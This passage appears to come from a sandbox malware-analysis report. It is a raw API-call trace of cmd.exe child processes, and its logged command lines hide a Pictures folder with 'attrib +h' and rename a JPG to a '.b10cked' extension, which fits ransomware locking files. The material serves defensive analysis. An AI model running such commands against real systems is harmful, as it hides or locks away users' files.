_Buffer=0x2ef238, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef0fc | out: _Buffer="00000000") returned 8 [0144.399] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0144.399] GetEnvironmentStringsW () returned 0x442e20* [0144.399] FreeEnvironmentStringsW (penv=0x442e20) returned 1 [0144.399] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0144.399] GetEnvironmentStringsW () returned 0x442e20* [0144.399] FreeEnvironmentStringsW (penv=0x442e20) returned 1 [0144.399] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef154 | out: lpAttributeList=0x2ef154) [0144.399] GetConsoleTitleW (in: lpConsoleTitle=0x2ef538, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.400] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0144.400] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0144.400] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0144.400] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2eedd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eedd4) returned 0xffffffff [0144.400] GetLastError () returned 0x2 [0144.400] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2eedd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eedd4) returned 0xffffffff [0144.400] GetLastError () returned 0x2 [0144.400] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2eedd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eedd4) returned 0x43e6f0 [0144.401] FindClose (in: hFindFile=0x43e6f0 | out: hFindFile=0x43e6f0) returned 1 [0144.401] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2eedd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eedd4) returned 0xffffffff [0144.401] GetLastError () returned 0x2 [0144.401] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2eedd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eedd4) returned 0x43e6f0 [0144.401] FindClose (in: hFindFile=0x43e6f0 | out: hFindFile=0x43e6f0) returned 1 [0144.401] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0144.401] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0144.401] GetConsoleTitleW (in: lpConsoleTitle=0x2ef2cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.401] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef154, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef21c | out: lpAttributeList=0x2ef154, lpSize=0x2ef21c) returned 1 [0144.401] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef154, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef214, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef154, lpPreviousValue=0x0) returned 1 [0144.401] GetStartupInfoW (in: lpStartupInfo=0x2ef110 | out: lpStartupInfo=0x2ef110*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0144.401] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0144.401] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ef1b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef1fc | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\"", lpProcessInformation=0x2ef1fc*(hProcess=0x50, hThread=0x4c, dwProcessId=0x974, dwThreadId=0x838)) returned 1 [0144.403] CloseHandle (hObject=0x4c) returned 1 [0144.403] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0144.404] GetEnvironmentStringsW () returned 0x443850* [0144.404] FreeEnvironmentStringsW (penv=0x443850) returned 1 [0144.404] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0144.481] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2ef0f0 | out: lpExitCode=0x2ef0f0*=0x0) returned 1 [0144.481] CloseHandle (hObject=0x50) returned 1 [0144.481] _vsnwprintf (in: _Buffer=0x2ef238, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef0fc | out: _Buffer="00000000") returned 8 [0144.481] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0144.481] GetEnvironmentStringsW () returned 0x443850* [0144.481] FreeEnvironmentStringsW (penv=0x443850) returned 1 [0144.481] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0144.481] GetEnvironmentStringsW () returned 0x443850* [0144.481] FreeEnvironmentStringsW (penv=0x443850) returned 1 [0144.481] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef154 | out: lpAttributeList=0x2ef154) [0144.481] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.481] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0144.481] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.481] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0144.482] _get_osfhandle (_FileHandle=0) returned 0x3 [0144.482] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0144.482] SetConsoleInputExeNameW () returned 0x1 [0144.482] GetConsoleOutputCP () returned 0x1b5 [0144.482] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0144.482] SetThreadUILanguage (LangId=0x0) returned 0x409 [0144.482] exit (_Code=0) Process: id = "188" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ae0" os_pid = "0x140" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\KYWWKR~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 16641 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 16642 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 16643 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 16644 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 16645 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 16646 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 16647 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 16648 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 16649 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 16650 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16715 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16716 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16717 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16718 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 16719 start_va = 0x600000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 16720 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16721 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16722 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16723 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16724 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16725 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16726 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16727 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16728 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16729 start_va = 0x220000 end_va = 0x2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 16730 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16731 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16732 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 16733 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 16734 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 16735 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 16736 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 16737 start_va = 0x610000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16738 start_va = 0x1210000 end_va = 0x1372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Thread: id = 244 os_tid = 0x8c4 [0143.606] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afd64 | out: lpSystemTimeAsFileTime=0x1afd64*(dwLowDateTime=0x8f868720, dwHighDateTime=0x1d440a9)) [0143.606] GetCurrentProcessId () returned 0x140 [0143.606] GetCurrentThreadId () returned 0x8c4 [0143.606] GetTickCount () returned 0x2cdd9 [0143.606] QueryPerformanceCounter (in: lpPerformanceCount=0x1afd5c | out: lpPerformanceCount=0x1afd5c*=20039505343) returned 1 [0143.606] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0143.606] __set_app_type (_Type=0x1) [0143.606] __p__fmode () returned 0x76b331f4 [0143.606] __p__commode () returned 0x76b331fc [0143.607] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0143.607] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0143.607] GetCurrentThreadId () returned 0x8c4 [0143.607] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8c4) returned 0x38 [0143.607] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0143.607] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0143.607] SetThreadUILanguage (LangId=0x0) returned 0x409 [0143.607] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0143.607] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afcf4 | out: phkResult=0x1afcf4*=0x0) returned 0x2 [0143.607] VirtualQuery (in: lpAddress=0x1afd2b, lpBuffer=0x1afcc4, dwLength=0x1c | out: lpBuffer=0x1afcc4*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.607] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afcc4, dwLength=0x1c | out: lpBuffer=0x1afcc4*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0143.607] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afcc4, dwLength=0x1c | out: lpBuffer=0x1afcc4*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0143.607] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afcc4, dwLength=0x1c | out: lpBuffer=0x1afcc4*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.607] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afcc4, dwLength=0x1c | out: lpBuffer=0x1afcc4*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0143.607] GetConsoleOutputCP () returned 0x1b5 [0143.608] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.608] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0143.608] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.608] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0143.608] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.608] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0143.608] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.608] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0143.608] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.608] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0143.608] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.608] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0143.609] GetEnvironmentStringsW () returned 0x330180* [0143.609] FreeEnvironmentStringsW (penv=0x330180) returned 1 [0143.609] GetEnvironmentStringsW () returned 0x330180* [0143.609] FreeEnvironmentStringsW (penv=0x330180) returned 1 [0143.609] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aec64 | out: phkResult=0x1aec64*=0x40) returned 0x0 [0143.609] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aec6c, lpData=0x1aec70, lpcbData=0x1aec68*=0x1000 | out: lpType=0x1aec6c*=0x0, lpData=0x1aec70*=0xa8, lpcbData=0x1aec68*=0x1000) returned 0x2 [0143.609] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aec6c, lpData=0x1aec70, lpcbData=0x1aec68*=0x1000 | out: lpType=0x1aec6c*=0x4, lpData=0x1aec70*=0x1, lpcbData=0x1aec68*=0x4) returned 0x0 [0143.609] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aec6c, lpData=0x1aec70, lpcbData=0x1aec68*=0x1000 | out: lpType=0x1aec6c*=0x0, lpData=0x1aec70*=0x1, lpcbData=0x1aec68*=0x1000) returned 0x2 [0143.609] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aec6c, lpData=0x1aec70, lpcbData=0x1aec68*=0x1000 | out: lpType=0x1aec6c*=0x4, lpData=0x1aec70*=0x0, lpcbData=0x1aec68*=0x4) returned 0x0 [0143.609] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aec6c, lpData=0x1aec70, lpcbData=0x1aec68*=0x1000 | out: lpType=0x1aec6c*=0x4, lpData=0x1aec70*=0x40, lpcbData=0x1aec68*=0x4) returned 0x0 [0143.609] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aec6c, lpData=0x1aec70, lpcbData=0x1aec68*=0x1000 | out: lpType=0x1aec6c*=0x4, lpData=0x1aec70*=0x40, lpcbData=0x1aec68*=0x4) returned 0x0 [0143.609] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aec6c, lpData=0x1aec70, lpcbData=0x1aec68*=0x1000 | out: lpType=0x1aec6c*=0x0, lpData=0x1aec70*=0x40, lpcbData=0x1aec68*=0x1000) returned 0x2 [0143.609] RegCloseKey (hKey=0x40) returned 0x0 [0143.609] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aec64 | out: phkResult=0x1aec64*=0x40) returned 0x0 [0143.609] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aec6c, lpData=0x1aec70, lpcbData=0x1aec68*=0x1000 | out: lpType=0x1aec6c*=0x0, lpData=0x1aec70*=0x40, lpcbData=0x1aec68*=0x1000) returned 0x2 [0143.609] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aec6c, lpData=0x1aec70, lpcbData=0x1aec68*=0x1000 | out: lpType=0x1aec6c*=0x4, lpData=0x1aec70*=0x1, lpcbData=0x1aec68*=0x4) returned 0x0 [0143.609] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aec6c, lpData=0x1aec70, lpcbData=0x1aec68*=0x1000 | out: lpType=0x1aec6c*=0x0, lpData=0x1aec70*=0x1, lpcbData=0x1aec68*=0x1000) returned 0x2 [0143.609] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aec6c, lpData=0x1aec70, lpcbData=0x1aec68*=0x1000 | out: lpType=0x1aec6c*=0x4, lpData=0x1aec70*=0x0, lpcbData=0x1aec68*=0x4) returned 0x0 [0143.609] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aec6c, lpData=0x1aec70, lpcbData=0x1aec68*=0x1000 | out: lpType=0x1aec6c*=0x4, lpData=0x1aec70*=0x9, lpcbData=0x1aec68*=0x4) returned 0x0 [0143.610] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aec6c, lpData=0x1aec70, lpcbData=0x1aec68*=0x1000 | out: lpType=0x1aec6c*=0x4, lpData=0x1aec70*=0x9, lpcbData=0x1aec68*=0x4) returned 0x0 [0143.610] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aec6c, lpData=0x1aec70, lpcbData=0x1aec68*=0x1000 | out: lpType=0x1aec6c*=0x0, lpData=0x1aec70*=0x9, lpcbData=0x1aec68*=0x1000) returned 0x2 [0143.610] RegCloseKey (hKey=0x40) returned 0x0 [0143.610] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886372 [0143.610] srand (_Seed=0x5b886372) [0143.610] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\KYWWKR~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg.b10cked\"" [0143.610] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\KYWWKR~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg.b10cked\"" [0143.610] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.610] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3318e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0143.610] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0143.610] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0143.610] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0143.610] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0143.610] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0143.610] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0143.610] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0143.610] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0143.610] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0143.610] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0143.610] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0143.610] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0143.611] GetEnvironmentStringsW () returned 0x3322d0* [0143.611] FreeEnvironmentStringsW (penv=0x3322d0) returned 1 [0143.611] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.611] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0143.611] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0143.611] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0143.611] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0143.611] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0143.611] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0143.611] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0143.611] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0143.611] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0143.611] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1afa30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.611] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1afa30, lpFilePart=0x1afa2c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1afa2c*="Desktop") returned 0x18 [0143.611] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0143.611] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af7ac | out: lpFindFileData=0x1af7ac) returned 0x330010 [0143.611] FindClose (in: hFindFile=0x330010 | out: hFindFile=0x330010) returned 1 [0143.611] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af7ac | out: lpFindFileData=0x1af7ac) returned 0x330010 [0143.611] FindClose (in: hFindFile=0x330010 | out: hFindFile=0x330010) returned 1 [0143.612] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af7ac | out: lpFindFileData=0x1af7ac) returned 0x330010 [0143.612] FindClose (in: hFindFile=0x330010 | out: hFindFile=0x330010) returned 1 [0143.612] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0143.612] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 